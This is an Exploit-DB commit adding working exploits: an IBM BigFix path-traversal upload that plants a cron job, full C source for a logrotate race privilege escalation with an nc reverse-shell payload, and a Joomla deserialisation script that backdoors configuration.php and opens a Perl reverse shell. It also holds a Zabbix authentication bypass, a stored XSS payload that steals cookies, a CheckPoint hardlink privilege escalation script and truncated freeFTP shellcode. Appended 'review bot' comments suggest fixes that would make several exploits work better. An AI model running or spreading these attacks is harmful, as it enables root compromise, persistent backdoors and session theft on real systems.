DB: 2019-10-08

8 changes to exploits/shellcodes

logrotten 3.15.1 - Privilege Escalation
ASX to MP3 converter 3.1.3.7 - '.asx' Local Stack Overflow (DEP)
CheckPoint Endpoint Security Client/ZoneAlarm 15.4.062.17802 - Privilege Escalation

freeFTP 1.0.8 - Remote Buffer Overflow
Joomla 3.4.6 - 'configuration.php' Remote Code Execution
Zabbix 4.2 - Authentication Bypass
Subrion 4.2.1 - 'Email' Persistant Cross-Site Scripting
IBM Bigfix Platform 9.5.9.62 - Arbitrary File Upload
Offensive Security 2019-10-08 05:01:48 +00:00
parent 0486c1c8ad
commit bfcf0daec9
9 changed files with 1052 additions and 0 deletions


@ -0,0 +1,180 @@
# Exploit Title: IBM Bigfix Platform 9.5.9.62 - Arbitrary File Upload
# Date: 2018-12-11
# Exploit Authors: Jakub Palaczynski
# Vendor Homepage: https://www.ibm.com/
# Version: IBM Bigfix Platform <= 9.5.9.62
# CVE: CVE-2019-4013
Description:
============
Any authenticated (even unprivileged) user can upload any file to any location on the server with root privileges. This results in code execution on underlying system with root privileges.
What caused this issue:
* path traversal - it is possible to escape from original directory and upload file to any other location
* server running with root privileges - user can upload file to ANY location on the system
* upload any type of file - application does not verify extension and MIME type of uploaded files
* authorization bypass (reported as separate issue) - any user can reveal privileged functionality and access it without proper rights set
* possibility to win the race - application uploads file to location specified in "urlFileName" parameter (path traversal), however it then moves it to another. An attacker needs to win race and execute script before it is moved.
Issue was found in "Apps > Software > Add Software" menu. Here user needs to choose upload via URL option as only this one is vulnerable.
URL needs to point to attacker's web server where he hosts for example script files.
When form is submitted we can see on proxy "urlFileName" parameter. This one is vulnerable to path traversal. This parameter specifies temporary file name that will be used on the system. Then application moves this file to another location that is not controlled by application user.
An attacker can for example upload script file on the web server and execute it by sending GET request. However as a PoC we will use cron. Here we upload 2 files - cron file and script file that will be executed by cron.
Uploading cron task and script file is the same as below but of course with different content downloaded from the web server. Those two HTTP requests should be sent in loop to finally win a race and execute our script.
Proof of Concept:
=================
cron.txt served on attacker's web server:
* * * * * root bash /tmp/icmp.sh
icmp.txt served on attacker's web server:
#!/bin/bash
ping -c 3 ATTACKER_IP
Uploading cron task:
POST /swd/api/packages/upload HTTP/1.1
Host: XXX
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
Content-Length: 846
Content-Type: multipart/form-data; boundary=---------------------------7289782871626994727576601809
X-XSRF-TOKEN: XXX
Cookie: _csrf=XXX; XSRF-TOKEN=XXX; user_session=XXX
Connection: close
-----------------------------7289782871626994727576601809
Content-Disposition: form-data; name="fileURL"
http://ATTACKER_IP/cron.txt
-----------------------------7289782871626994727576601809
Content-Disposition: form-data; name="username"
-----------------------------7289782871626994727576601809
Content-Disposition: form-data; name="password"
-----------------------------7289782871626994727576601809
Content-Disposition: form-data; name="urlFileName"
../../../../../../../../etc/cron.d/task
-----------------------------7289782871626994727576601809
Content-Disposition: form-data; name="urlDownloadAtRuntime"
false
-----------------------------7289782871626994727576601809
Content-Disposition: form-data; name="uploadId"
user_1543410578364620
-----------------------------7289782871626994727576601809--
Uploading script file:
POST /swd/api/packages/upload HTTP/1.1
Host: XXX
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
Content-Length: 846
Content-Type: multipart/form-data; boundary=---------------------------7289782871626994727576601809
X-XSRF-TOKEN: XXX
Cookie: _csrf=XXX; XSRF-TOKEN=XXX; user_session=XXX
Connection: close
-----------------------------7289782871626994727576601809
Content-Disposition: form-data; name="fileURL"
http://ATTACKER_IP/icmp.txt
-----------------------------7289782871626994727576601809
Content-Disposition: form-data; name="username"
-----------------------------7289782871626994727576601809
Content-Disposition: form-data; name="password"
-----------------------------7289782871626994727576601809
Content-Disposition: form-data; name="urlFileName"
../../../../../../../../tmp/icmp.sh
-----------------------------7289782871626994727576601809
Content-Disposition: form-data; name="urlDownloadAtRuntime"
false
-----------------------------7289782871626994727576601809
Content-Disposition: form-data; name="uploadId"
user_1543410578364620
-----------------------------7289782871626994727576601809--
After a while our script should be executed with root privileges.
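Review bot: both requests carry the identical `Content-Length: 846` although their bodies differ (`cron.txt` vs `icmp.txt`, `/etc/cron.d/task` vs `/tmp/icmp.sh`), so at least one value is wrong and a replayed request would be truncated or rejected; drop the header from the listing or note that the client must recompute it. The header also gives no fixed version or vendor advisory for CVE-2019-4013, and the "authorization bypass (reported as separate issue)" bullet has no reference, both of which a defender needs in order to confirm remediation. The "What caused this issue" list has no Mitigation counterpart; the defensive reading of those four bullets (reject path separators in `urlFileName`, run the upload service unprivileged, validate extension and MIME type, enforce authorization on the Add Software function) would complete the report.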


@ -0,0 +1,354 @@
# Exploit Title: logrotten 3.15.1 - Privilege Escalation
# Date: 2019-10-04
# Exploit Author: Wolfgang Hotwagner
# Vendor Homepage: https://github.com/logrotate/logrotate
# Software Link: https://github.com/logrotate/logrotate/releases/tag/3.15.1
# Version: all versions through 3.15.1
# Tested on: Debian GNU/Linux 9.5 (stretch)
## Brief description
- logrotate is prone to a race condition after renaming the logfile.
- If logrotate is executed as root, with option that creates a
file ( like create, copy, compress, etc.) and the user is in control
of the logfile path, it is possible to abuse a race-condition to write
files in ANY directories.
- An attacker could elevate his privileges by writing reverse-shells into
directories like "/etc/bash_completition.d/".
## Precondition for privilege escalation
- Logrotate has to be executed as root
- The logpath needs to be in control of the attacker
- Any option that creates files is set in the logrotate configuration
## Tested version
- Debian GNU/Linux 9.5 (stretch)
- Amazon Linux 2 AMI (HVM)
- Ubuntu 18.04.1
- logrotate 3.8.6
- logrotate 3.11.0
- logrotate 3.15.0
## Compile
- gcc -o logrotten logrotten.c
## Prepare payload
```
echo "if [ `id -u` -eq 0 ]; then (/bin/nc -e /bin/bash myhost 3333 &);
fi" > payloadfile
```
## Run exploit
If "create"-option is set in logrotate.cfg:
```
./logrotten -p ./payloadfile /tmp/log/pwnme.log
```
If "compress"-option is set in logrotate.cfg:
```
./logrotten -p ./payloadfile -c -s 4 /tmp/log/pwnme.log
```
## Known Problems
- It's hard to win the race inside a docker container or on a lvm2-volume
## Mitigation
- make sure that logpath is owned by root
- use option "su" in logrotate.cfg
- use selinux or apparmor
## Author
- Wolfgang Hotwagner
## References
- https://github.com/whotwagner/logrotten
-
https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition
-
https://tech.feedyourhead.at/content/abusing-a-race-condition-in-logrotate-to-elevate-privileges
- https://www.ait.ac.at/themen/cyber-security/ait-sa-20190930-01/
-
https://tech.feedyourhead.at/content/privilege-escalation-in-groonga-httpd
logrotten.c
/*
* logrotate poc exploit
*
* [ Brief description ]
* - logrotate is prone to a race condition after renaming the logfile.
* - If logrotate is executed as root and the user is in control of the logfile path, it is possible to abuse a race-condition to write files in ANY directories.
* - An attacker could elevate his privileges by writing reverse-shells into
* directories like "/etc/bash_completition.d/".
*
* [ Precondition for privilege escalation ]
* - Logrotate needs to be executed as root
* - The logpath needs to be in control of the attacker
* - Any option(create,compress,copy,etc..) that creates a new file is set in the logrotate configuration.
*
* [ Tested version ]
* - Debian GNU/Linux 9.5 (stretch)
* - Amazon Linux 2 AMI (HVM)
* - Ubuntu 18.04.1
* - logrotate 3.8.6
* - logrotate 3.11.0
* - logrotate 3.15.0
*
* [ Compile ]
* - gcc -o logrotten logrotten.c
*
* [ Prepare payload ]
* - echo "if [ `id -u` -eq 0 ]; then (/bin/nc -e /bin/bash myhost 3333 &); fi" > payloadfile
*
* [ Run exploit ]
* - nice -n -20 ./logrotten -p payloadfile /tmp/log/pwnme.log
* - if compress is used: nice -n -20 ./logrotten -c -s 3 -p payloadfile /tmp/log/pwnme.log.1
*
* [ Known Problems ]
* - It's hard to win the race inside a docker container or on a lvm2-volume
*
* [ Mitigation ]
* - make sure that logpath is owned by root
* - use su-option in logrotate.cfg
* - use selinux or apparmor
*
* [ Author ]
* - Wolfgang Hotwagner
*
* [ Contact ]
* - https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition
* - https://tech.feedyourhead.at/content/abusing-a-race-condition-in-logrotate-to-elevate-privileges
* - https://github.com/whotwagner/logrotten
*/
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <sys/types.h>
#include <sys/inotify.h>
#include <unistd.h>
#include <string.h>
#include <alloca.h>
#include <sys/stat.h>
#include <getopt.h>
#define EVENT_SIZE ( sizeof (struct inotify_event) )
#define EVENT_BUF_LEN ( 1024 * ( EVENT_SIZE + 16 ) )
/* use TARGETDIR without "/" at the end */
#define TARGETDIR "/etc/bash_completion.d"
#define PROGNAME "logrotten"
void usage(const char* progname)
{
printf("usage: %s [OPTION...] <logfile>\n",progname);
printf(" %-3s %-22s %-30s\n","-h","--help","Print this help");
printf(" %-3s %-22s %-30s\n","-t","--targetdir <dir>","Abosulte path to the target directory");
printf(" %-3s %-22s %-30s\n","-p","--payloadfile <file>","File that contains the payload");
printf(" %-3s %-22s %-30s\n","-s","--sleep <sec>","Wait before writing the payload");
printf(" %-3s %-22s %-30s\n","-d","--debug","Print verbose debug messages");
printf(" %-3s %-22s %-30s\n","-c","--compress","Hijack compressed files instead of created logfiles");
printf(" %-3s %-22s %-30s\n","-o","--open","Use IN_OPEN instead of IN_MOVED_FROM");
}
int main(int argc, char* argv[] )
{
int length, i = 0;
int j = 0;
int index = 0;
int fd;
int wd;
char buffer[EVENT_BUF_LEN];
uint32_t imask = IN_MOVED_FROM;
char *payloadfile = NULL;
char *logfile = NULL;
char *targetdir = NULL;
char *logpath;
char *logpath2;
char *targetpath;
int debug = 0;
int sleeptime = 1;
char ch;
const char *p;
FILE *source, *target;
int c;
while(1)
{
int this_option_optind = optind ? optind : 1;
int option_index = 0;
static struct option long_options[] = {
{"payloadfile", required_argument, 0, 0},
{"targetdir", required_argument, 0, 0},
{"sleep", required_argument, 0, 0},
{"help", no_argument, 0, 0},
{"open", no_argument, 0, 0},
{"debug", no_argument, 0, 0},
{"compress", no_argument, 0, 0},
{0,0,0,0}
};
c = getopt_long(argc,argv,"hocdp:t:s:", long_options, &option_index);
if (c == -1)
break;
switch(c)
{
case 'p':
payloadfile = alloca((strlen(optarg)+1)*sizeof(char));
memset(payloadfile,'\0',strlen(optarg)+1);
strncpy(payloadfile,optarg,strlen(optarg));
break;
case 't':
targetdir = alloca((strlen(optarg)+1)*sizeof(char));
memset(targetdir,'\0',strlen(optarg)+1);
strncpy(targetdir,optarg,strlen(optarg));
break;
case 'h':
usage(PROGNAME);
exit(EXIT_FAILURE);
break;
case 'd':
debug = 1;
break;
case 'o':
imask = IN_OPEN;
break;
case 'c':
imask = IN_OPEN;
break;
case 's':
sleeptime = atoi(optarg);
break;
default:
usage(PROGNAME);
exit(EXIT_FAILURE);
break;
}
}
if(argc == (optind+1))
{
logfile = alloca((strlen(argv[optind])+1)*sizeof(char));
memset(logfile,'\0',strlen(argv[optind])+1);
strncpy(logfile,argv[optind],strlen(argv[optind]));
}
else
{
usage(PROGNAME);
exit(EXIT_FAILURE);
}
for(j=strlen(logfile); (logfile[j] != '/') && (j != 0); j--);
index = j+1;
p = &logfile[index];
logpath = alloca(strlen(logfile)*sizeof(char));
logpath2 = alloca((strlen(logfile)+2)*sizeof(char));
if(targetdir != NULL)
{
targetpath = alloca( ( (strlen(targetdir)) + (strlen(p)) +3) *sizeof(char));
strcat(targetpath,targetdir);
}
else
{
targetdir= TARGETDIR;
targetpath = alloca( ( (strlen(TARGETDIR)) + (strlen(p)) +3) *sizeof(char));
targetpath[0] = '\0';
strcat(targetpath,TARGETDIR);
}
strcat(targetpath,"/");
strcat(targetpath,p);
for(j = 0; j < index; j++)
logpath[j] = logfile[j];
logpath[j-1] = '\0';
strcpy(logpath2,logpath);
logpath2[strlen(logpath)] = '2';
logpath2[strlen(logpath)+1] = '\0';
/*creating the INOTIFY instance*/
fd = inotify_init();
if( debug == 1)
{
printf("logfile: %s\n",logfile);
printf("logpath: %s\n",logpath);
printf("logpath2: %s\n",logpath2);
printf("targetpath: %s\n",targetpath);
printf("targetdir: %s\n",targetdir);
printf("p: %s\n",p);
}
/*checking for error*/
if ( fd < 0 ) {
perror( "inotify_init" );
}
wd = inotify_add_watch( fd,logpath, imask );
printf("Waiting for rotating %s...\n",logfile);
while(1)
{
i=0;
length = read( fd, buffer, EVENT_BUF_LEN );
while (i < length) {
struct inotify_event *event = ( struct inotify_event * ) &buffer[ i ]; if ( event->len ) {
if ( event->mask & imask ) {
if(strcmp(event->name,p) == 0)
{
rename(logpath,logpath2);
symlink(targetdir,logpath);
printf("Renamed %s with %s and created symlink to %s\n",logpath,logpath2,targetdir);
if(payloadfile != NULL)
{
printf("Waiting %d seconds before writing payload...\n",sleeptime);
sleep(sleeptime);
source = fopen(payloadfile, "r");
if(source == NULL)
exit(EXIT_FAILURE);
target = fopen(targetpath, "w");
if(target == NULL)
{
fclose(source);
exit(EXIT_FAILURE);
}
while ((ch = fgetc(source)) != EOF)
fputc(ch, target);
chmod(targetpath,S_IRUSR | S_IXUSR | S_IRGRP | S_IXGRP | S_IROTH | S_IXOTH);
fclose(source);
fclose(target);
}
inotify_rm_watch( fd, wd );
close( fd );
printf("Done!\n");
exit(EXIT_SUCCESS);
}
}
}
i += EVENT_SIZE + event->len;
}
}
/*removing from the watch list.*/
inotify_rm_watch( fd, wd );
/*closing the INOTIFY instance*/
close( fd );
exit(EXIT_SUCCESS);
}
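Review bot: in the `targetdir != NULL` branch `targetpath` is obtained from `alloca()` and then passed straight to `strcat(targetpath,targetdir)` without the `targetpath[0] = '\0';` that the default branch performs, so with `-t` the path is built on uninitialized stack memory and gets a garbage prefix. `char ch;` combined with `while ((ch = fgetc(source)) != EOF)` should be `int ch;`, otherwise a 0xFF byte in the payload file is indistinguishable from EOF (or, with unsigned char, the loop never ends). `case 'o'` and `case 'c'` both set `imask = IN_OPEN`, so the `--compress` option the usage text describes separately behaves exactly like `--open`; if that is intended the usage text should say so. `inotify_init()` failure is reported with `perror` but execution continues into `inotify_add_watch` with a negative descriptor. Documentation inconsistencies: the description spells the directory `/etc/bash_completition.d/` while `TARGETDIR` is `/etc/bash_completion.d`, the header claims "all versions through 3.15.1" while the tested list stops at 3.15.0, and the Run section in the markdown omits the `nice -n -20` prefix and the `.1` suffix that the C header's Run section uses.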

exploits/php/webapps/47465.py Executable file

@ -0,0 +1,182 @@
# Exploit Title: Joomla 3.4.6 - 'configuration.php' Remote Code Execution
# Google Dork: N/A
# Date: 2019-10-02
# Exploit Author: Alessandro Groppo @Hacktive Security
# Vendor Homepage: https//www.joomla.it/
# Software Link: https://downloads.joomla.org/it/cms/joomla3/3-4-6
# Version: 3.0.0 --> 3.4.6
# Tested on: Linux
# CVE : N/A
#
# Technical details: https://blog.hacktivesecurity.com/index.php?controller=post&action=view&id_post=41
# Github: https://github.com/kiks7/rusty_joomla_rce
#
# The exploitation is implanting a backdoor in /configuration.php file in the root directory
# with an eval in order to be more suitable for all environments, but it is also more intrusive.
# If you don't like this way, you can replace the get_backdoor_pay()
# with get_pay('php_function', 'parameter') like get_pay('system','rm -rf /')
#!/usr/bin/env python3
import requests
from bs4 import BeautifulSoup
import sys
import string
import random
import argparse
from termcolor import colored
PROXS = {'http':'127.0.0.1:8080'}
PROXS = {}
def random_string(stringLength):
letters = string.ascii_lowercase
return ''.join(random.choice(letters) for i in range(stringLength))
backdoor_param = random_string(50)
def print_info(str):
print(colored("[*] " + str,"cyan"))
def print_ok(str):
print(colored("[+] "+ str,"green"))
def print_error(str):
print(colored("[-] "+ str,"red"))
def print_warning(str):
print(colored("[!!] " + str,"yellow"))
def get_token(url, cook):
token = ''
resp = requests.get(url, cookies=cook, proxies = PROXS)
html = BeautifulSoup(resp.text,'html.parser')
# csrf token is the last input
for v in html.find_all('input'):
csrf = v
csrf = csrf.get('name')
return csrf
def get_error(url, cook):
resp = requests.get(url, cookies = cook, proxies = PROXS)
if 'Failed to decode session object' in resp.text:
#print(resp.text)
return False
#print(resp.text)
return True
def get_cook(url):
resp = requests.get(url, proxies=PROXS)
#print(resp.cookies)
return resp.cookies
def gen_pay(function, command):
# Generate the payload for call_user_func('FUNCTION','COMMAND')
template = 's:11:"maonnalezzo":O:21:"JDatabaseDriverMysqli":3:{s:4:"\\0\\0\\0a";O:17:"JSimplepieFactory":0:{}s:21:"\\0\\0\\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:FUNC_LEN:"FUNC_NAME";s:10:"javascript";i:9999;s:8:"feed_url";s:LENGTH:"PAYLOAD";}i:1;s:4:"init";}}s:13:"\\0\\0\\0connection";i:1;}'
#payload = command + ' || $a=\'http://wtf\';'
payload = 'http://l4m3rz.l337/;' + command
# Following payload will append an eval() at the enabled of the configuration file
#payload = 'file_put_contents(\'configuration.php\',\'if(isset($_POST[\\\'test\\\'])) eval($_POST[\\\'test\\\']);\', FILE_APPEND) || $a=\'http://wtf\';'
function_len = len(function)
final = template.replace('PAYLOAD',payload).replace('LENGTH', str(len(payload))).replace('FUNC_NAME', function).replace('FUNC_LEN', str(len(function)))
return final
def make_req(url , object_payload):
# just make a req with object
print_info('Getting Session Cookie ..')
cook = get_cook(url)
print_info('Getting CSRF Token ..')
csrf = get_token( url, cook)
user_payload = '\\0\\0\\0' * 9
padding = 'AAA' # It will land at this padding
working_test_obj = 's:1:"A":O:18:"PHPObjectInjection":1:{s:6:"inject";s:10:"phpinfo();";}'
clean_object = 'A";s:5:"field";s:10:"AAAAABBBBB' # working good without bad effects
inj_object = '";'
inj_object += object_payload
inj_object += 's:6:"return";s:102:' # end the object with the 'return' part
password_payload = padding + inj_object
params = {
'username': user_payload,
'password': password_payload,
'option':'com_users',
'task':'user.login',
csrf :'1'
}
print_info('Sending request ..')
resp = requests.post(url, proxies = PROXS, cookies = cook,data=params)
return resp.text
def get_backdoor_pay():
# This payload will backdoor the the configuration .PHP with an eval on POST request
function = 'assert'
template = 's:11:"maonnalezzo":O:21:"JDatabaseDriverMysqli":3:{s:4:"\\0\\0\\0a";O:17:"JSimplepieFactory":0:{}s:21:"\\0\\0\\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:FUNC_LEN:"FUNC_NAME";s:10:"javascript";i:9999;s:8:"feed_url";s:LENGTH:"PAYLOAD";}i:1;s:4:"init";}}s:13:"\\0\\0\\0connection";i:1;}'
# payload = command + ' || $a=\'http://wtf\';'
# Following payload will append an eval() at the enabled of the configuration file
payload = 'file_put_contents(\'configuration.php\',\'if(isset($_POST[\\\'' + backdoor_param +'\\\'])) eval($_POST[\\\''+backdoor_param+'\\\']);\', FILE_APPEND) || $a=\'http://wtf\';'
function_len = len(function)
final = template.replace('PAYLOAD',payload).replace('LENGTH', str(len(payload))).replace('FUNC_NAME', function).replace('FUNC_LEN', str(len(function)))
return final
def check(url):
check_string = random_string(20)
target_url = url + 'index.php/component/users'
html = make_req(url, gen_pay('print_r',check_string))
if check_string in html:
return True
else:
return False
def ping_backdoor(url,param_name):
res = requests.post(url + '/configuration.php', data={param_name:'echo \'PWNED\';'}, proxies = PROXS)
if 'PWNED' in res.text:
return True
return False
def execute_backdoor(url, payload_code):
# Execute PHP code from the backdoor
res = requests.post(url + '/configuration.php', data={backdoor_param:payload_code}, proxies = PROXS)
print(res.text)
def exploit(url, lhost, lport):
# Exploit the target
# Default exploitation will append en eval function at the end of the configuration.pphp
# as a bacdoor. btq if you do not want this use the funcction get_pay('php_function','parameters')
# e.g. get_payload('system','rm -rf /')
# First check that the backdoor has not been already implanted
target_url = url + 'index.php/component/users'
make_req(target_url, get_backdoor_pay())
if ping_backdoor(url, backdoor_param):
print_ok('Backdoor implanted, eval your code at ' + url + '/configuration.php in a POST with ' + backdoor_param)
print_info('Now it\'s time to reverse, trying with a system + perl')
execute_backdoor(url, 'system(\'perl -e \\\'use Socket;$i="'+ lhost +'";$p='+ str(lport) +';socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};\\\'\');')
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('-t','--target',required=True,help='Joomla Target')
parser.add_argument('-c','--check', default=False, action='store_true', required=False,help='Check only')
parser.add_argument('-e','--exploit',default=False,action='store_true',help='Check and exploit')
parser.add_argument('-l','--lhost', required='--exploit' in sys.argv, help='Listener IP')
parser.add_argument('-p','--lport', required='--exploit' in sys.argv, help='Listener port')
args = vars(parser.parse_args())
url = args['target']
if(check(url)):
print_ok('Vulnerable')
if args['exploit']:
exploit(url, args['lhost'], args['lport'])
else:
print_info('Use --exploit to exploit it')
else:
print_error('Seems NOT Vulnerable ;/')
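Review bot: `check()` builds `target_url = url + 'index.php/component/users'` but then calls `make_req(url, ...)` with the bare `url`, so the check posts to the site root, unlike `exploit()`, which does use `target_url`; the two should agree or the check result will not predict the exploit path. The `#!/usr/bin/env python3` line sits after the comment header, so it is inert as a shebang and the file should open with it. `PROXS` is assigned twice with the empty dict overriding the first; remove the dead assignment or gate it behind a flag. `get_token()` assumes the CSRF token is the last `<input>` on the page, which deserves a comment on which Joomla template that holds for, and `ping_backdoor()` joins `url + '/configuration.php'` while `check()` joins `url + 'index.php/...'`, so the script only behaves consistently when `--target` ends in a slash; document that requirement in the argparse help. Comment typos: "configuration.pphp", "bacdoor", "btq", "funcction", and the referenced helper is `gen_pay` not `get_pay`/`get_payload`.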


@ -0,0 +1,63 @@
# Exploit Title: Zabbix 4.2 - Authentication Bypass
# Date: 2019-10-06
# Exploit Author: Milad Khoshdel
# Software Link: https://www.zabbix.com/download
# Version: Zabbix [2.x , 3.x , 4.x] Tested on latest version Zabbix 4.2
# Tested on: Linux Apache/2 PHP/7.2
# Google Dork: inurl:zabbix/zabbix.php
=========
Vulnerable Page:
=========
/zabbix.php?action=dashboard.view&dashboardid=1
=========
POC:
=========
Attacker can bypass login page and access to dashboard page and create [Dashboard/Report/Screen/Map] without any Username/Password and anonymously.
All Created elements [Dashboard/Report/Screen/Map] is accessible by other users and admin.
REGUEST -->
GET /zabbix.php?action=dashboard.view&dashboardid=1 HTTP/1.1
Host: [HOST-IP]
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
RESPONSE -->
HTTP/1.1 200 OK
Date: Sun, 06 Oct 2019 11:40:18 GMT
Server: Apache/2.4.29 (Ubuntu)
Set-Cookie: zbx_sessionid=a8d192ec833bd4476e0f6a550e6e5bed; HttpOnly
Set-Cookie: PHPSESSID=i2j8kt08m7dp3ojstqeaod9joo; path=/; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: PHPSESSID=i2j8kt08m7dp3ojstqeaod9joo; path=/; HttpOnly
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Content-Length: 19239
Connection: close
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html>
<html>
[Dashboard Page Content Will Load Here]
</html>
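Review bot: the PoC shows only an unauthenticated GET of `dashboard.view` returning 200, but the claim that an anonymous visitor can create Dashboard/Report/Screen/Map objects that other users and the admin then see is not backed by any request/response pair; a second exchange demonstrating a write would make the report verifiable. The report also does not say whether the built-in `guest` account was enabled on the test instance, which a defender needs in order to tell a configuration issue from a product flaw, and the Version line claims 2.x, 3.x and 4.x while "Tested on" names only 4.2. The response block repeats the `PHPSESSID` Set-Cookie header, and "REGUEST" should read "REQUEST".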


@ -0,0 +1,17 @@
# Title: Subrion 4.2.1 - 'Email' Persistant Cross-Site Scripting
# Date: 2019-10-07
# Author: Min Ko Ko (Creatigon)
# Vendor Homepage: https://subrion.org/
# CVE : https://nvd.nist.gov/vuln/detail/CVE-2019-17225
# Website : https://l33thacker.com
# Description : Allows XSS via the panel/members/ Username, Full Name, or
# Email field, aka an "Admin Member JSON Update" issue.
First login the panel with user credential, Go to member tag from left menu.
http://localhost/panel/members/
Username, Full Name, Email are editable with double click on it. Insert the
following payload
<img src=x onerror=alert(document.cookie)>
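Review bot: the steps say "login the panel with user credential" but never state which panel role is required, nor where the stored value is later rendered, so the impact (which users view the member list and whether an administrator session is exposed) cannot be assessed from the report; the CVE text quoted in the header ("Admin Member JSON Update") suggests an admin-panel context, and the required privilege should be spelled out. "Persistant" in the title should be "Persistent", and "Go to member tag" presumably means "member tab".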


@ -0,0 +1,71 @@
# Exploit Title: CheckPoint Endpoint Security Client/ZoneAlarm 15.4.062.17802 - Privilege Escalation
# Date: 2019-01-30
# Exploit Author: Jakub Palaczynski
# Vendor Homepage: https://www.checkpoint.com/
# Version: Check Point Endpoint Security VPN <= E80.87 Build 986009514
# Version: Check Point ZoneAlarm <= 15.4.062.17802
# CVE: CVE-2019-8452
Description:
============
It is possible to change permissions of arbitrary file so that user have full control over it after exploitation which results in Local Privilege Escalation.
It was found that Check Point software (Endpoint Security Client and ZoneAlarm) uses tvDebug.log file stored in "C:\Windows\Internet Logs\tvDebug.log" or in ProgramData, for example "C:\ProgramData\CheckPoint\ZoneAlarm\Logs\tvDebug.log".
Over this log file all authenticated users have full control and it was found that Check Point service writes to it with SYSTEM privileges.
However this file could not be used for exploitaion as it is always used/taken by Check Point service so for example this is why users cannot delete it in normal conditions (unless service crashes and/or is restarted).
However it was noticed that when this log file reaches some limit (depending on software) then it is archived to the same location and name but with ZIP extension. The same permissions are set for this archive file so all authenticated users can access it.
Taking all of this into account we can create an attack scenario:
1. If tvDebug.zip file exists then delete it
2. Create hardlink (using CreateHardlink.exe) named tvDebug.zip which points to other file that we would like to have permissions to (this file must not be taken by other process when Check Point service tries to use it)
3. Fill tvDebug.log log file above the limit. For ZoneAlarm it is 50Mb, for VPN it is 20Mb. It can be done by using software as normal user.
4. Restart system as service needs to be restarted to make an archive.
5. Now your file has permissions changed and you have all access to it.
6. If we pointed to "C:\Program Files (x86)\CheckPoint\Endpoint Connect\LogonISReg.dll" in step 2 then we can replace this DLL with custom one.
7. Click "VPN Options" in Client GUI and then close this windows. Closing "VPN Options" window forces LogonISReg.dll to be loaded with SYSTEM privileges.
Proof of Concept:
=================
# PoC written in PowerShell to fully exploit Check Point Endpoint Client. It can be used also to exploit ZoneAlarm.
# file that we want to have permissions to
# LogonISReg.dll is not used on startup and we can force to load it with SYSTEM privileges after exploitation
$file = "C:\Program Files (x86)\CheckPoint\Endpoint Connect\LogonISReg.dll"
# path to symboliclink testing tools CreateHardlink.exe
# CreateHardlink.exe is a tool created by James Forshaw - https://github.com/googleprojectzero/symboliclink-testing-tools
$hardlink = "C:\Temp\CreateHardlink.exe"
Write-Host "[!] Detecting Check Point software."
if ([System.IO.File]::Exists("$env:windir\Internet Logs\tvDebug.log")) {
$logfile = "$env:windir\Internet Logs\tvDebug.zip"
Write-Host "[+] Check Point Endpoint Security found."
}
elseif ([System.IO.File]::Exists("$env:programdata\CheckPoint\ZoneAlarm\Logs\tvDebug.log")) {
$logfile = "$env:programdata\CheckPoint\ZoneAlarm\Logs\tvDebug.zip"
Write-Host "[+] Check Point ZoneAlarm found."
}
else {
Write-Host "[-] Check Point software was not found."
}
Write-Host "[!] Trying to delete tvDebug.zip file."
if ([System.IO.File]::Exists($logfile)) {
while ([System.IO.File]::Exists($logfile)) { Remove-Item -Force 朴ath $logfile -ErrorAction SilentlyContinue }
Write-Host "[+] Successfully deleted tvDebug.zip archive file."
}
else {
Write-Host "[+] tvDebug.zip archive file was not found."
}
Write-Host "[!] Creating hardlink to a file that we would like to change permissions."
Start-Process -FilePath "cmd.exe" -ArgumentList "/c $hardlink `"$logfile`" `"$file`""
while (!([System.IO.File]::Exists($logfile))) { Sleep 1 }
Write-Host "[+] Hardlink successfully created."
Write-Host "[!] 1. Fill log file up to the limit and restart computer."
Write-Host "[!] 2. Now when permissions are changed replace LogonISReg.dll with your custom DLL."
Write-Host "[!] 3. Click VPN Options in Client GUI and close this window to force DLL load."
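Review bot: `Remove-Item -Force 朴ath $logfile` contains a mis-encoded `-Path` (mojibake from a non-UTF-8 save), so the script as committed does not parse; re-save the file as ASCII/UTF-8. The detection `else` branch prints "not found" but does not `exit`, so `$logfile` stays empty and execution continues into the `Start-Process` call and then into `while (!([System.IO.File]::Exists($logfile))) { Sleep 1 }`, which never terminates for an empty path; add an `exit 1` there. The header names CVE-2019-8452 and two affected versions but no fixed build or vendor advisory, which defenders need to verify remediation, and "exploitaion" in the description should be "exploitation".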


@ -0,0 +1,63 @@
# Exploit Title: freeFTP 1.0.8 - Remote Buffer Overflow
# Date: 2019-09-01
# Author: Chet Manly
# Software Link: https://download.cnet.com/FreeFTP/3000-2160_4-10047242.html
# Version: 1.0.8
# CVE: N/A
from ftplib import FTP
buf = ""
buf += "\x89\xe1\xdb\xdf\xd9\x71\xf4\x5e\x56\x59\x49\x49\x49"
buf += "\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43"
